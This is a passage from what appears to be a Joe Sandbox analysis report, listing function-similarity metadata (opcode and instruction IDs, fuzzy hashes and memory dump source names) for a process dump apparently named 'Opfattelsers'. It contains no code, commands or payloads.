                                                                            • Opcode Fuzzy Hash: 3f7ef6010d119159a70e55a1c2896d0bec07369feaf947745203de0cc9ded3fb
                                                                            • Instruction Fuzzy Hash: 8F31F276600600EFD712CF68DC80B5ABBB9EB85764F184199E549CF242D635ED41CBE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2852b84358099d8785c81e621e9c33d535e1f8eb86f5a7a8bdd4df358de7f71b
                                                                            • Instruction ID: 4a817bf428288728c364b84662498015e61ca552fcf047ac52235bed23b61eb9
                                                                            • Opcode Fuzzy Hash: 2852b84358099d8785c81e621e9c33d535e1f8eb86f5a7a8bdd4df358de7f71b
                                                                            • Instruction Fuzzy Hash: 9931BF7A6007219FE701DF58E4C039A37A4FF55364F91817AF8489F201E7B6EA05CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                                                            • Instruction ID: 59d44aa7656a409471665500a85235dc9275fb76e2029bd2d48d7f61a678abc6
                                                                            • Opcode Fuzzy Hash: 5792c921ca3ca2bbbe232b517931b81ea903973909e8099156e3e3dd86bc70c3
                                                                            • Instruction Fuzzy Hash: 18219235610214EFD751CFA9DC84E9BBBB9EF85B80F164265F5059B250D276EE00CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1cb89dc8453322be10ca780b9ce544bd0d1f08463ad1f8477815dbc91ad6d0dc
                                                                            • Instruction ID: c6e7735b066b49f3c65b7e451966a7f65ae233383135ccdbe08f17c6d7ca4271
                                                                            • Opcode Fuzzy Hash: 1cb89dc8453322be10ca780b9ce544bd0d1f08463ad1f8477815dbc91ad6d0dc
                                                                            • Instruction Fuzzy Hash: 0931C1706047858FC328CF29C584756B7E4FFC5324F24CA6DD4AA8F291EB72A806CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 88513b4c4f4fd1af65167f4424e581df12b404261e64a5a43095150c765bbac1
                                                                            • Instruction ID: 86bbef8925be151e9829e277a411b00938928539e9faf74220c9d01b0804ca37
                                                                            • Opcode Fuzzy Hash: 88513b4c4f4fd1af65167f4424e581df12b404261e64a5a43095150c765bbac1
                                                                            • Instruction Fuzzy Hash: AB319A76A00744CFDB11CF59C880B8AB7B1AF84724F164619E8259B390D7BAED01CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 24d70f97034e45b3790e6e13c47cfe03ae90d0219eca2f13fbe7e55ebcae098d
                                                                            • Instruction ID: fd7b2fd53405c82a778840bc57f15b0c2e5d690347cb66f8583c5638cbcfe201
                                                                            • Opcode Fuzzy Hash: 24d70f97034e45b3790e6e13c47cfe03ae90d0219eca2f13fbe7e55ebcae098d
                                                                            • Instruction Fuzzy Hash: 9E213A72A00715AFCB12CF98C980F9EBBB9EF45750F150065F901AF260D670ED00C7A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ef0e0e162d9b3b8acde0098a06a0aaae3b5706f1281894a134faa60f4cb2fa19
                                                                            • Instruction ID: b755d102963b4c87f7f543b2b5b6056f6fab6f9ee42072f288fde2d11e4d7c0a
                                                                            • Opcode Fuzzy Hash: ef0e0e162d9b3b8acde0098a06a0aaae3b5706f1281894a134faa60f4cb2fa19
                                                                            • Instruction Fuzzy Hash: 0721AD39201A81CFE3958B6DC498BA273E4FB42B14F04459AEC82CB690D339E8C2D610
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7529f03d8d6d0c09c55f30759a23746ad9d4425f43da7201b48547ea020f4f4a
                                                                            • Instruction ID: 8e9f2b265dcda3dc72902c1899c4dff3c350aa134baf3b823d2303da24afd41c
                                                                            • Opcode Fuzzy Hash: 7529f03d8d6d0c09c55f30759a23746ad9d4425f43da7201b48547ea020f4f4a
                                                                            • Instruction Fuzzy Hash: 4D317C76A112E9CFCB48CFA8D680B5DB7B1BB89720F148A59D415AF740CB35BD41CBA0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0ff26ecf0c567d8288b5ae592ee0e72a23131616df718fc2984f8068e1e495a3
                                                                            • Instruction ID: 6d39800292550216ae19f8198e88cce2ed0f12d77b2ec72235bf179f1b23426a
                                                                            • Opcode Fuzzy Hash: 0ff26ecf0c567d8288b5ae592ee0e72a23131616df718fc2984f8068e1e495a3
                                                                            • Instruction Fuzzy Hash: FB210070204B82DFCB255A35D858B0677B3BBC4328F584719F8925E9E0EB32B851CBA1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1d4d6f988a04c1197bbb35a210e0f9af50d7f23546d8c653631b39b5b6da95ee
                                                                            • Instruction ID: 5aacb3a0cb1c3d84bf725065b389d2c6946d5abdfe68144a13506bbc61ffe672
                                                                            • Opcode Fuzzy Hash: 1d4d6f988a04c1197bbb35a210e0f9af50d7f23546d8c653631b39b5b6da95ee
                                                                            • Instruction Fuzzy Hash: EB21F276A00215EFDB118F59C884F8ABBB5EF85764F0A8265FA049F214DF34EE40CB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e6689242450c0b1374e92ebd2e7380abb1c9bd64cfc4b2ea19698bdb3f7e53e
                                                                            • Instruction ID: 98ada212bd32c7350cdb916fe95bd3899fc114f6a668f9f1b340ce405eba6f60
                                                                            • Opcode Fuzzy Hash: 8e6689242450c0b1374e92ebd2e7380abb1c9bd64cfc4b2ea19698bdb3f7e53e
                                                                            • Instruction Fuzzy Hash: 3021A13A600709AFDB22CF59D944F9B7BB9EF85760F114029F5459B360EA70ED01DB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3929694f3905af1f749a0eb407148cf8a485d6ad2bbe172017e1e65db35563ae
                                                                            • Instruction ID: 3377ed74e30ee6bcf3ad0ecef6fc23d4e5861c255f915e3d2faba3bd7230a517
                                                                            • Opcode Fuzzy Hash: 3929694f3905af1f749a0eb407148cf8a485d6ad2bbe172017e1e65db35563ae
                                                                            • Instruction Fuzzy Hash: 7A219D75A00309EFD721DF68D944A9ABBF8EF44750F10846BE985EB291E370ED01CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e922d32d8be57c82137771ab3e3846df4152a11a23d6bc7fecf85d7dd53ab7f2
                                                                            • Instruction ID: 6905e908b96a2abc7dbd94379da249a0e87c7c54a055bdf82f985f1034c44672
                                                                            • Opcode Fuzzy Hash: e922d32d8be57c82137771ab3e3846df4152a11a23d6bc7fecf85d7dd53ab7f2
                                                                            • Instruction Fuzzy Hash: 1B218B37A00646EBDB22CE69CC58F9B77E9EF84760F014429E9199F261E630E902CB50
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d5075b7f83c67d1940b8b114beefcc5f4160eb2fe90bbf0d7e9b9085c0e089cb
                                                                            • Instruction ID: d4f9ccbb0d258ba4e05bcb057a1089028b45ff001e94597ecee6e741b5dbf1b8
                                                                            • Opcode Fuzzy Hash: d5075b7f83c67d1940b8b114beefcc5f4160eb2fe90bbf0d7e9b9085c0e089cb
                                                                            • Instruction Fuzzy Hash: B6219DB2601742CFEB118F54C994B53BBA4FB45718F068169E9054F389C7B9E844CFE0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                            • Instruction ID: a3a0daed32ceeb48448fb7503f25035ccd866546df83be86e768a801199d407d
                                                                            • Opcode Fuzzy Hash: 2c127abe4603a0a42779a20a6cf4765ca859a8c0cd1fe1c92a88c9a2ea8e3ac3
                                                                            • Instruction Fuzzy Hash: 9521BF72D10A21DFC714CF75E4906E9B3F4FF44321F2586AAC865AB650E770BA42CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3304334a5e820e0e0838685a57cbe283422d1da52b1180b304d2b856fa05c1a7
                                                                            • Instruction ID: 5584e5b7a55d390cb4b33d013e85a008e2d0e326be9fca87408bdce152eea947
                                                                            • Opcode Fuzzy Hash: 3304334a5e820e0e0838685a57cbe283422d1da52b1180b304d2b856fa05c1a7
                                                                            • Instruction Fuzzy Hash: C5213132705A81CBD7068BACCC48F6633A9FB4A710F0A06A1EC018F791EA35F940C691
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9106b0e16e0d9274273e173b49b0bb58b33c11270f42d3e8594f20948277ef95
                                                                            • Instruction ID: fd06b5265039993e2615c36df6de2ced9be63e45c31757d3cbdd6503a44597cb
                                                                            • Opcode Fuzzy Hash: 9106b0e16e0d9274273e173b49b0bb58b33c11270f42d3e8594f20948277ef95
                                                                            • Instruction Fuzzy Hash: 52118E72B00B12BBD7154E299850751B2A4BB43365F410726AD309B6A0DB71FAE2CAD0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: de41c423100e383d5485a65bbb2e82094a228262a8d4fd109420fd7dfd8bee38
                                                                            • Instruction ID: 36c4b7fe5f1272015a5c71ce95588991fee48938a6c3ab64a0806016094dd900
                                                                            • Opcode Fuzzy Hash: de41c423100e383d5485a65bbb2e82094a228262a8d4fd109420fd7dfd8bee38
                                                                            • Instruction Fuzzy Hash: E81129359012169BCB20DF68E450AFABBE9FF16720F14056AE855E7340E631EC42C7A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7f612daadd6012d76d948d0d3e1404b0e60fa5b3e9964f3856df163099499767
                                                                            • Instruction ID: 6067ca03c0965efe947ee5cb233235445173bce48556db8ab3bd5a0e2770f464
                                                                            • Opcode Fuzzy Hash: 7f612daadd6012d76d948d0d3e1404b0e60fa5b3e9964f3856df163099499767
                                                                            • Instruction Fuzzy Hash: D9218672500B00DFC726DF68E984F69B7B5FF08728F18496DE016876A1C735B950CB84
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8e0df73b55497ddfadbe26ba18f34ecf871e8180e658a7c35b004a84e1aee84d
                                                                            • Instruction ID: fc3c160b8bf4d9c2caf0e2a1a7d508f546fa6de070e7a3202e13afdcd9ca1d55
                                                                            • Opcode Fuzzy Hash: 8e0df73b55497ddfadbe26ba18f34ecf871e8180e658a7c35b004a84e1aee84d
                                                                            • Instruction Fuzzy Hash: 17216772501653EFC791CF14C50098ABFBAFF42719B65D1A9E50A9F250EB31EE82CB90
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                            • Instruction ID: 6b6de2de6076d1e3005a590a6c06447a7663b38159c0c1f3d9c1af967333196e
                                                                            • Opcode Fuzzy Hash: c5acb5f3ba083c4099dfa29a6382a993b1cbc49009cdf177e412d1a340e2cc6a
                                                                            • Instruction Fuzzy Hash: D4118937A00624EBCB228E55DC50FAB7B69EF85B61F024559AD188F261D730E802C7E0
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d42c7d42c4a75547a7b4ea78731f5edd61198e367b7d7a9055d86f58e8ec8b46
                                                                            • Instruction ID: 37f9dfdfcaf88211949a512b520a1ca7b3937460b7173be2c16f2d057cdb0153
                                                                            • Opcode Fuzzy Hash: d42c7d42c4a75547a7b4ea78731f5edd61198e367b7d7a9055d86f58e8ec8b46
                                                                            • Instruction Fuzzy Hash: E021D475E013098BE745CF69C4847EE77A4FB88328F2A8218D812572D0DBBBA985C750
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 973400442d3c5e046792108bf518a27f683d13b91e8c5e625d87686afed6957d
                                                                            • Instruction ID: 9992ec9eec1df2c05008403eb3bc80ff1c3a30bcd9d13ba3d66a6e0a35493060
                                                                            • Opcode Fuzzy Hash: 973400442d3c5e046792108bf518a27f683d13b91e8c5e625d87686afed6957d
                                                                            • Instruction Fuzzy Hash: F8216ABA502792DFC709CF68D195A48BBF1FB95328B50C66EC0168F690E732B481CF00
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: abcc6e9fbdaf9bb9a279b5fdb2f331e50a1ada754a7a5942bd9dc68cf1b47f70
                                                                            • Instruction ID: 1852464d03affdd3bd4190c38b89171081c2836093cc6e36b807c8c6b0cd7649
                                                                            • Opcode Fuzzy Hash: abcc6e9fbdaf9bb9a279b5fdb2f331e50a1ada754a7a5942bd9dc68cf1b47f70
                                                                            • Instruction Fuzzy Hash: F811EE366096869BD7019B68D819F6937AABF49350F0807A8FC448F381EF35FA51C2A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 74018bc5ee8c74341236a8215733c5786a400f4067e73c29109e5b678e4c9934
                                                                            • Instruction ID: bb2d698f8adfc40a3f8d0b014ad0291ac8d0cf41ca44fcfdfecf70cfefabc7c0
                                                                            • Opcode Fuzzy Hash: 74018bc5ee8c74341236a8215733c5786a400f4067e73c29109e5b678e4c9934
                                                                            • Instruction Fuzzy Hash: 2F113038202A91CBD3148B2DC8A0BA2B3E4FB45318F49055AF9C28B740E37AF881C620
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.3053292989.000000001F770000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F770000, based on PE: true
                                                                            • Associated: 00000006.00000002.3053292989.000000001F899000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F89D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000006.00000002.3053292989.000000001F90E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_6_2_1f770000_Opfattelsers.jbxd
                                                                            Similarity
                                                                            • API ID:
